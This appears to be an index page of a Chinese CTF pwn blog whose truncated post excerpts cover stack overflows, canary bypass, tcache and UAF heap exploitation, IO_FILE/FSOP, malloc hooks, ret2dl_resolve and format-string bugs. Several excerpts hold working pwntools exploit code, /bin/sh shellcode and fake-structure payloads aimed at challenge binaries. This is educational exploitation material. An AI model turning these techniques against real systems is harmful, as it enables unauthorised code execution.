[K] dec ebx 0x4a [Fe]...

checksec发现保护都没开，应该是直接写shellcode然后ret2shellcode。 EXP: from pwn import * context.log_level='debug' shellcode = '\x31\xc9\xf7\xe1\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xb0\x0b\xcd\x80' #p=remote("chall.pwnable.tw",10000) print len(shellcode) p=process("./start") print p.recvuntil(":") raw_input() p.sendline("".ljust(20,'x')+p32(0x8048087)) data=p.recv() leak=(u32(data[:4])) print hex(leak) sleep(1) p.sendline('a'*20+p32(leak+20)+shellcode) checksec之后依然什么保护都没开于是丢进了IDA 发现使用了PR_GET_NO_NEW_PRIVS 避免安全漏洞，白名单：open，read，write 于是我们可以写shellcode： open /home/orw/flag read flag write flag from pwn import * shellcode = '' shellcode += asm('xor ecx,ecx;mov eax,0x5; push ecx;push 0x67616c66; push 0x2f77726f; push 0x2f656d6fpush 0x682f2f2f; mov ebx,esp;xor edx,edx;int 0x80;') shellcode +=...

建议和three一起做.很多逻辑都差不多 增加了一个edit功能 但是减少了一个可以控制的point magic of tcache & fast bin checksec ➜ Desktop checksec houseofAtum [*] '/home/n132/Desktop/houseofAtum' Arch: amd64-64-little RELRO: Full RELRO Stack: Canary found NX: NX enabled PIE: PIE enabled 全保护 主要的漏洞点也和three 一样:uaf ➜ Desktop checksec houseofAtum [*] '/home/n132/Desktop/houseofAtum' Arch: amd64-64-little RELRO: Full RELRO Stack: Canary found NX: NX enabled PIE: PIE enabled ➜ Desktop 但是主要的限制是: if ( v1 <...

附件 简洁的一道题..主要考利用…咸鱼的我调了一个晚上加上办个下午没调出来 (后来反证自己走进了死胡同..) 最后改变风水思路… 主要功能有add,free,edit 限制是最多3个chunk可以被执行操作 可以选择清除不清除array上的指针 ```python ➜ three checksec three [*] ‘/home/n132/Desktop/three/three’ Arch: amd64-64-little RELRO: Full RELRO Stack: Canary found NX: NX enabled PIE: PIE enabled 用的libc是2.27有tcache 漏洞点是uaf # 利用 #也不太好讲..主要自己调一遍坑都跳一遍就差不多有点思路了 * 利用uaf控制tcache改写`stdout`#具体为啥在babytecache那篇博客中写过 * 继而改写free_hook为system * free /bin/sh fengshui: 一开始我傻逼的地尝试了控制0x70结尾的地方…做了半天做不出来 因为在改写完stdout后将会失去一个可以操作的指针…free不掉 两个指针要实现tcache atk 就要满足两者存在over lap 才可以改掉size 显然0x70不如0x50来的灵活…当时没用0x50是因为0x50的那个指针也是不能free的.. ``` 利用uaf控制0x50结尾的地址（目的是方便改size） 改0x60的size为0x91 free 满tcache 获得一个unsortedbin 0x50的tcache改到0x91上 partial write指向stdout 改stdout去泄露libc free...

Canary 主要是为了防止溢出而开发的栈保护机制 看了一些canary的由来这个很有意思 17世纪，英国矿井工人发现，金丝雀对瓦斯这种气体十分敏感。空气中哪怕有极其微量的瓦斯，金丝雀也会停止歌唱；而当瓦斯含量超过一定限度时，虽然鲁钝的人类毫无察觉，金丝雀却早已毒发身亡。当时在采矿设备相对简陋的条件下，工人们每次下井都会带上一只金丝雀作为“瓦斯检测指标”，以便在危险状况下紧急撤离。 摘自https://veritas501.space/2017/04/28/%E8%AE%BAcanary%E7%9A%84%E5%87%A0%E7%A7%8D%E7%8E%A9%E6%B3%95/ 我们在逆程序的时候常常会看到像是这样的东西: v4 = __readfsqword(0x28u); return __readfsqword(0x28u) ^ v4; 或者在gdb调试的时候回发现 0x400882 mov rax, qword ptr [rsp + 0x108] 0x40088a xor rax, qword ptr fs:[0x28] ► 0x400893 ✔ jne 0x4008a9 ↓ 0x4008a9 call __stack_chk_fail@plt <0x400650> 原理上就是在开始的时候往栈里放一个随机的值像是0xdd687609fc59dc00 这样看起来就不像是正常值末尾带着一个nullbyte的值 在函数结束的时候再次在fs或者gs寄存器取出canary和栈上的canary比较如果不同那么 call __stack_chk_fail@plt 之后会call abort 结束程序 编译的时候可以加上以下命令来关闭 -fno-stackprotector 绕过方法一下主要有 泄露和破坏__stack_chk_fail函数两种 在最后介绍一个利用方法 ssp leak 泄露canary也就是利用某些方法读出栈上的canary 根据不同的环境 泄露方法有很多 char buf[0x10]; read(0,buf,0x100); puts(buf);...

附件 baby_tcache的低级版… baby_tcache 主要漏洞在strcpy存在null byte off 只要像babytcache一样构造直接show来leak就可以了… 主要思路在上题链接中这里不多赘述 from pwn import * def cmd(c): p.sendlineafter("ice: ",str(c)) def add(size,data): cmd(1) p.sendlineafter("Size:",str(size)) p.sendafter("Data:",data) def show(idx): cmd(2) p.sendlineafter("Index:",str(idx)) def free(idx): cmd(3) p.sendlineafter("Index:",str(idx)) p=process("./children_tcache") libc=ELF("/lib/x86_64-linux-gnu/libc.so.6") for x in range(6): add(0x80,"\n") add(0x5e0,'\n')#6 add(0x500,'\n')#7 add(0x80,'\n')#8 free(6) add(0x18,'B'*0x18)#6 add(0x80,'\n')#9 for x in range(6): free(x) free(8) free(6) add(0x100,'\n')#0 free(9) free(7) add(0x350,'\n')#1 add(0x30,'\n')#2 add(0x40,'\n')#3 show(0) base=u64(p.readline()[:-1].ljust(8,'\x00'))-(0x7ffff7dcfca0-0x7ffff79e4000) libc.address=base log.warning(hex(base)) add(0x100,'\n')...

收获挺大的一题,IO_FILE 真好用….angelboy,david942j真的厉害。。。 附件 程序逻辑很简答: void __fastcall __noreturn main(__int64 a1, char **a2, char **a3) { __int64 cmd; // rax init_0(); while ( 1 ) { while ( 1 ) { menu(); cmd = get_cmd(); if ( cmd != 2 ) break; del(); } if ( cmd == 3 ) _exit(0); if ( cmd == 1 ) add(); else puts("Invalid Choice"); }...

PUBG PICK A GUN first AND you have two choise : gang or gou gou : you may find AWM gang : if you dont have AWM you will die IF you win you can leak something and you can overflow to control the RIP so enjoy the game you can leak libc by for ( j = 0; j...

最近看到HItcon2018的babytcache发现IO_FILE还是博大精深，之前对于IO_FILE的理解还是十分稚嫩只知道orange和普通的利用… 尔后又看了老钟的博客感觉IO_FILE神奇的很! 收获满满 老钟博客传送点 开始自己动手把lowkey师傅的课件的题探索一遍… 感觉lowkey师傅的课件还是循循善诱当时基础太差没领会其中奥妙… 开始写前膜一波angelboy lowkey zs0zrc 像是一些我們熟悉的gets puts 都和IO_FILE有关 基础部分之前在echo和orange介绍过一些就不介绍了 在32bit系统中，_IO_jump_t的偏移是0x94，64bit系统中偏移是0xE8 64位: 存在后门情况 payload='\x00'*0x10+p64(sh)+"\x00"*0x70+p64(buf) payload=payload.ljust(0xd8,'\x00')+p64(buf) payload=payload.ljust(0x100)#充填防髒數據 不存在后门情况 payload="/bin/sh".ljust(0x10,'\x00')+p64(system)+"\x00"*0x70+p64(buf+0x20)#此处地址上值为0 payload=payload.ljust(0xd8,'\x00')+p64(buf+0x10-0x88) payload=payload.ljust(0x100,'\x00')#防止脏数据 32位： 伪造IO_FILE_plus结构体, 32位和64位不一样，32位的需要伪造vtable,而64位可以不用伪造vtable，因为64位的在绕过几个函数后会获得一次call [rax + 0x10]的机会（zs0zrc） #存在後門sh use_IO_new_fclose payload="".ljust(0x48,'\x00')+p32(buf)+p32(sh) payload=payload.ljust(0x94,'\x00')+p32(buf+0x4c-0x8) payload=payload.ljust(0x100,"\x00") #不存在後門情況 use __fclose payload="/bin/sh".ljust(0x48,'\x00')+p32(buf+8)+p32(system)#0ff 0x48 處指向地址值位0 payload=payload.ljust(0x94,'\x00')+p32(buf-0x44+0x4c) payload=payload.ljust(0x100,"\x00")

Kamikaze做完之后我想Kamikaze…… 感觉这题主要烦在利用难 做完之后收获挺大，堆风水思路很重要。。。 在风水先生的路上又前进了一步 主要结构体 00000000 00000000 song struc ; (sizeof=0x28, mappedto_6) 00000000 weight dq ? 00000008 stanza dq ? ; offset 00000010 next dq ? ; offset 00000018 hook dq ? 00000020 hook2 dq ? 00000028 song ends 主要漏洞点 unsigned __int64 kamimaze() { int i; // [rsp+Ch] [rbp-34h] int wei; // [rsp+10h] [rbp-30h] int seed; // [rsp+14h] [rbp-2Ch] song...

在ctfwiki上看到的 over 虽然很简单但是很精练 可以作为一般stack migration的范本 程序很简单 有0x10的溢出 可以覆盖rbp和ret address 可以泄露栈地址(rfd) 泄露栈地址 ->栈迁移到可控区域leak libc ->跳回main ->改掉返回地址为one_gadget from pwn import * def repeat(c): p.readuntil(">") p.send(c) bin=ELF("./over.over") libc=ELF("/lib/x86_64-linux-gnu/libc.so.6") context.log_level='debug' leave=0x00000000004006be pr=0x0000000000400793 main=0x0000000004006C0 p=process("./over.over") payload="A"*0x50 repeat(payload) p.readuntil("A"*0x50) data=p.readline() stack=u64(data[:-1].ljust(8,"\0")) log.warning(hex(stack)) payload=p64(0xdeadbeef)+p64(pr)+p64(bin.got['puts'])+p64(bin.plt['puts'])+p64(main) payload=payload.ljust(0x50,'\0')+p64(stack-0x70)+p64(leave) repeat(payload) p.readline() data=p.readline() base=u64(data[:-1].ljust(8,"\0")) base=base-libc.symbols['puts'] libc.address=base one=0x4526a+base log.warning(hex(base)) repeat("A"*0x50+p64(0xdeadbeef)+p64(one)) p.interactive()

粗浅的理解，可能理解不对的地方很多。 最近遇到好多题通过hook来跳shell，好处是只要泄露了libc并且有任意写的能力就可以将one_gadget写入libc中的__malloc_hook(例)在调用malloc的时候就会跳到one_gadget。 libc中的hook机制，主要用于内存分配，它就像无处不在的钩子一样，一旦设置好了 hook，我们就可以在内存分配的地方随心所欲地做我们想做的事情。(摘自别人博客) 上源码——> malloc.c void * __libc_malloc (size_t bytes) { mstate ar_ptr; void *victim; void *(*hook) (size_t, const void *) = atomic_forced_read (__malloc_hook); if (__builtin_expect (hook != NULL, 0)) return (*hook)(bytes, RETURN_ADDRESS (0)); .... .... 之前只知道malloc的主要实现在int_malloc，事实上会先检查是否存在hook如果存在hook那么执行hook指向的函数. 由于c基础太差 这里插入一些关于函数指针的内容 函数指针，指向函数的指针定义方法如下 返回类型 (*函数指针名称)(参数类型,参数类型,参数类型，…); 看起来和函数的定义方法相似只是要在指针名称前加一个* #include<stdio.h> void (*p)(int a); void add(int a) { printf("%d\n",a+1); } int main() { add(11); p=add; p(12);...

struct _IO_FILE 定义在 glibc/libio/bits/types/struct_FILE.h struct _IO_FILE { int _flags; /* High-order word is _IO_MAGIC; rest is flags. */ /* The following pointers correspond to the C++ streambuf protocol. */ char *_IO_read_ptr; /* Current read pointer */ char *_IO_read_end; /* End of get area. */ char *_IO_read_base; /* Start of putback+get area. */ char *_IO_write_base; /* Start of put area. */...

题目: 链接 0x00： 比赛的时候就感觉很奇怪,啥都没有咋过的canary做不出来，卒 比赛之后看了官方的exp搞了半天居然发现自己连exp都看不懂… 然后幸亏找到了Sakura师傅的博客 总结起来还是自己太菜了 0x01：准备 TSL 在创建进程时为了避免全局|静态变量访问冲突，所以需要一个副本 在x86-64 glibc下用mmap创建线程 所以可以通过溢出覆盖掉canary 下面是fs段寄存器的结构 typedef struct { void *tcb; /* Pointer to the TCB. Not necessarily the thread descriptor used by libpthread. */ dtv_t *dtv; void *self; /* Pointer to the thread descriptor. */ int multiple_threads; int gscope_flag; uintptr_t sysinfo; uintptr_t stack_guard; uintptr_t pointer_guard; ... } tcbhead_t; 0x02：分析 可以看到这里有0x900的溢出 然后我们用gdb调试...

对于动态链接lazy binding在winesap的社课中已经说得非常清楚 在这里不作过多赘述。 #[A_paper_about_how_to_pwn_by_using_dl_resolver][2] relro 是一种用于加强对 binary 数据段的保护的技术。relro 分为 partial relro 和 full relro.gcc的默认是开partial.论文中涉及了对3种程度保护的理论上的攻击方法.由于时间有限和能力不足，只对no和partial进行实现；如有不正之处请予以指正@@338_5518_6880@qq.com@@ #include<stdio.h> #include<unistd.h> #include<string.h> char buf[1000000]; void m() { char local[10]; int len=read(0,buf,sizeof(buf)); memcpy(local,buf,len); } int main() { m(); } gcc raw.c -o part -no-pie -fno-stack-protector -m32 gcc raw.c -o no -no-pie -fno-stack-protector -Wl,-z,norelro -m32 思路： 因为Dynstr是可以写的，我们只需要改写Dynstr表来将某一函数错误解析到system上 所以我们需要 1.改写Dynstr 2.Call plt0 exploit： from pwn import * context.log_level='critical'...

发现Ubuntu16.04编译libc 2.23不！会！报！错！ 如果想锻炼自己解决问题能力的可以在kali上编译. 我发现于编译完3个月后… by the way ubuntu 做pwn真的好用. 需要低版本的libc学习heap利用技巧 老潘说可以下一个libc自己编译 于是乎 开始了5.1爬坑之旅 在过程中发现百度上关于这方面遇到问题之后的solution太少 谷歌上也没有比较详尽全面的教程。 于是记录一下自己在kali下 编译libc 的过程 ## 0x02 prepare Time ： 2018-04-30 Linux版本信息： ```c Linux Nine 4.6.0-kali1-amd64 #1 SMP Debian 4.6.4-1kali1 (2016-07-21) x86_64 GNU/Linux ``` Info for glibc-2.23： 下载地址===>[http://ftp.gnu.org/gnu/glibc/glibc-2.23.tar.gz][1] Other libc： 其他版本的libc[http://ftp.gnu.org/gnu/glibc/][2] cd mkdir libc && cd libc wget http://ftp.gnu.org/gnu/glibc/glibc-2.23.tar.gz tar -xf glibc-2.23.tar.gz cd glibc-2.23/ mkdir build &&...

本文为CTFALLINONE3.3.1前3节内容的笔记整理与理解 如有错误欢迎指正 格式化字符串漏洞基本原理 根据 cdecl 的调用约定，在进入 printf() 函数之前，将参数从右到左依次压 栈。进入 printf() 之后，函数首先获取第一个参数，一次读取一个字符。如果 字符不是 % ，字符直接复制到输出中。否则，读取下一个非空字符，获取相应的 参数并解析输出。（注意： % d 和 %d 是一样的） 示例代码： 格式化字符串漏洞利用 1.使程序崩溃 2.查看任意栈内容 这个就比较有用了 # echo 0 > /proc/sys/kernel/randomize_va_space $ gcc -m32 -fno-stack-protector -no-pie fmt.c 我们可以输入很多个%p来将栈上的内容显示 python2 -c 'print("%08p"*20)' | ./a.out 上面的方法都是依次获得栈中的参数，如果我们想要直接获得第n个参数的某个参数 可以使用 %n$x 3.查看任意地址的内存 这个地址我们作为参数传入，然后找到我们传入参数后对应我们输入的那个地址再查看其所指向的内容 例如 1st： "AAAA"+".%p"*20作为输入 2ed： 假设通过gdb查看到AAAA为输出的第k个字符 3th： "<想要查看的地址>"+"%k$s"作为输入 4th： 输出结果第5字节开始便为内容 进阶用法： 1st: readelf -r...

-hda fat:rw:<FolderNmae> directory <path> sed -i -r 's/security.ubuntu.com/old-releases.ubuntu.com/g' /etc/apt/sources.list sed -i -r 's/([a-z]{2}.)?archive.ubuntu.com/old-releases.ubuntu.com/g' /etc/apt/sources.list balsn CTF: Asian Parents https://bugs.chromium.org/p/project-zero/issues/detail?id=2276 wget https://bootstrap.pypa.io/pip/2.7/get-pip.py Write asm code and compile it to obj file Compile the c code to obj file link them together Use -no-pie --static to keep everything simple sample code wget https://bootstrap.pypa.io/pip/2.7/get-pip.py python ./get-pip.py replace ubuntu/security with old-released from pwn import...